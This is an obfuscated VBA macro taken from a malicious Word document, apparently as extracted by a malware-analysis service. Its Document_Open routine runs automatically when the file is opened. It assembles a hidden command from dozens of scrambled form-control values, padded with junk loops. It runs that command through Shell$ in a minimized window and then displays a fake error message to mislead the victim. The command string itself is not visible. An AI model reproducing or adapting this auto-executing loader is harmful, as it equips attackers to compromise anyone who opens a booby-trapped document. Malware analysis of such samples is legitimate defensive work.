Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub document_open()



login.AbhrSDTswoCmdqH = login.rDpiGsPwXqjgRYUI + login.HCZwQakiNubzPlUJG + login.tkARxnTIvuqYDXbKCZ + login.DTWdBEvCZQIsXayeNLgiJOPq + login.jZtuxHGaSbgUWlOzFqApJDQCV + login.UutlcYpnyBVhqNrAjCEROHkPSG + login.FhWJErYLCfQlGqiMzaj + login.jweKnYlgcpTMubsGDxvhUZtLR + login.qlJNvEtmWygFjYRcrOsnSHu + login.MsLbNDPmwXthjRFU
For i = 78 To 3233
    SkhFAmqcJHGDQlpwrNYVbMidT = juQYrNafvtZeEWTsMPqJmhkDI
Next i
login.zOZLcJNKhDpmxXPsRoIgGV = login.fDpwAUGdmXYqgulo + login.yhgTfXPSmpzEvrdADkZtUxIaeH + login.jVRzMnLNFOxJkKoiePYZTdWUtb + login.taINzWUBoOHPVyYmskJhGw + login.POtDyvUZTpaHhiKJR + login.EbXZleMsRvQacOSY + login.JxKVeQaYMpSZqwhiOvuNXgfA + login.upSrhsjwZOxIdDnkXaKMBG + login.UQRGdnPVNqMkiLmZ + login.vfrFbLEyKWdYMSiAm
For i = 2286 To 4231
    RCfKWZTobJnYcBjlxvLhraGFXS = LadYoRxjPCFscZQhDfqKNUXSEk
Next i
login.FyiUVrOSQAlKWTbjfLzcNBRP = login.kPydGWpvnmBlIwxKJCYDaMhF + login.sAeETVSrlzLDucjiPZtfq + login.MizhHdeqkgQarmKYuClDIZG + login.CObmnlWEYsXJBHQofV + login.QYjbMvpkqWlNcJUDFeutzOS + login.cQYFeqhXnORpdyzrKiuIsCTZa + login.bajqkzGJUWLQyEVMDBZHnc + login.EWkxDmwJKVzYglThivfROp + login.uaZSYFWvHRgKfznJiXsVpTly + login.pVmqdfYTUzPvhLSeQoickZgyR
For i = 614 To 4386
    hQzcBeKrWuHiCXmwaURTDnkLN = vlSBQcKYmxtEHzNyFiUAwXTMa
Next i
login.EhyktTFHbYWRdIMmUDuAq = login.sMnTlHIfuOQytBi + login.rUiYeXIVaMsRCoTOuFZLKpdN + login.WHqYxjUioBbdVhgzTwNQXP + login.mkHwEauTWCJlQVBDp + login.LYOgqBaVelCoPsQRpWnvZz + login.ThBudjimFCspyzISH + login.esodWEjkDAMLHOtFNgQfCilPuK + login.pNBuxvmefcWrdhJlRtkzM + login.GKUMYVdEDZqThvkpbWRrz + login.JVfSzCKHQnBvisG
For i = 1314 To 5976
    MIchUEJvBeRZyHgFumto = ncFBzeyvNPhWbTYsfqKQ
Next i
login.KhbYiBWyRZIomJs = login.MOmswSfeonyjHKdRCg + login.BDrsZnpdHlVoyfM + login.ADawzigrvRQYlUCmPE + login.VxzYTgHpmyvFWwlM + login.kFHXYdWcIlhaKsjpmtM + login.gMpXrabjHDCSExfqFePZ + login.wbjcgLruPpZNGUdmYioOnM + login.xtjhsBzoZwWYcqui + login.zHgwQrWIdYVMBqJUPDZticKhbj + login.RabtDlsecriCNIoJuGynSLE
For i = 881 To 6624
    PdzRSUgOVjLNoXa = rpqsHjWIAumoTGP
Next i
login.SXfrGvEAzhoxmuCwBLI = login.UbrHAhpjoPgYfVEZSLQaOR + login.dFgyEjulSUvRbhoADMemwCJO + login.LauVKsdUNxJfBpnAkWyQzi + login.YNxUsvBoCKkOWDpyHSwlbM + login.RFwzWVydePKmuqoExJ + login.GxSyKAdnsrRuhEPqFDfoaJ + login.WuwsTDcNrKlfxqXgeZUH + login.MGNazDFJvrqUCIXPLElQRjof + login.OBbmhaSNpkfvErnsJL + login.VBaInYoXicEOvpjSRxZuGUl
For i = 2706 To 8045
    NDiWGOtFlcLpVdIkvYab = mFtHYfGnWIwuCNSbxpiz
Next i
login.mMAdSQBGioRKbyDVrzLCsnpW = login.IJbqNRePSBzfxUykGFWosX + login.rBHJIluWDhgTpMafzZQ + login.hPcEIMLuDGJTfZmFgqsUka + login.HlOJrxhAUeFGSCWXKTzZvjaQ + login.aZgPNjXlMCDqbWKmrTxBoJSVie + login.RJdXemKZqzkDUixCy + login.zhdZVLeOMxFqTvurnNHpoXl + login.ZTpNWSgvQCOBeMfuIzr + login.RyvHNLFEIipgBTSMnbJuwexQc + login.abUwMKJxzZgFsuETflIYG
For i = 701 To 6490
    hvqDycBNxUekporHzdfgQsR = QMNwUFDXOmvodbSiqyuHgaG
Next i
login.lfNQgYsjCaFcrPnXy = login.ezxfLSjnubBPQFgMwqlsi + login.vxzoiclnSZrfIVHW + login.fjoMadKIyOluSTzF + login.juZJzsyhWrnVNaqdUPYLiCTgS + login.BeJgcbIAVrUFqnPzxlhD + login.HCPodckbliaGgFStxENQ + login.fvFtXEunWqByxOhYMJVGd + login.bdLtjHacgvyoiKzrREkGUBCJ + login.PUSkwcuZfmBCjAX + login.sGoCnPaLgcZEQBwzM
For i = 122 To 6039
    yCejArEiDuPLRNXtabKzW = EtrCVdYLfDkoweIQXmbSl
Next i
login.FjGOqcDzZnLaSvkw = login.gfXohRcGvLpsaTNjMABWn + login.GVQlyopOhKSzUECaxAjuf + login.RxTMvJuODsNheSXCLfiaAG + login.EDdJBcClVthYAbOqsGHzmKyFI + login.zYxOZANtlvLRIhbnSjHDeBgfk + login.YCBlUEzNtsdJvWALeMcG + login.zviULsnDCmueHQPYTkFAWJd + login.ogcRmGtnWULiAYOHK + login.ouYfSErOcCJnGdQDUkPK + login.lZeXnHNiJGRzDVyQAf
For i = 1619 To 4303
    xenasPEqgDuMGVKUWAQmChSYpL = rfdoEeilhkBTFjGPIJygmzXtxR
Next i


login.jymbLQFwYUqHOiPSfXIGlM = login.AbhrSDTswoCmdqH + _
login.zOZLcJNKhDpmxXPsRoIgGV + _
login.FyiUVrOSQAlKWTbjfLzcNBRP + _
login.EhyktTFHbYWRdIMmUDuAq + _
login.KhbYiBWyRZIomJs + _
login.SXfrGvEAzhoxmuCwBLI + _
login.mMAdSQBGioRKbyDVrzLCsnpW + _
login.lfNQgYsjCaFcrPnXy + _
login.FjGOqcDzZnLaSvkw


Shell$ login.jymbLQFwYUqHOiPSfXIGlM, 2



MsgBox "DOM object template processing failed"



End Sub


Attribute VB_Name = "login"
Attribute VB_Base = "0{C328BA8E-2D87-419D-A099-02CE2F80B50B}{84DA2508-D46A-4483-B29A-C89B839840B0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' InQuest injected base64 decoded content
' Kf[(
' Ts2r
' c<!lq
' @	JY6
' l	)\
' Gfb*
' T<6m
' ,IPF:
' NA@X

INQUEST-PP=macro
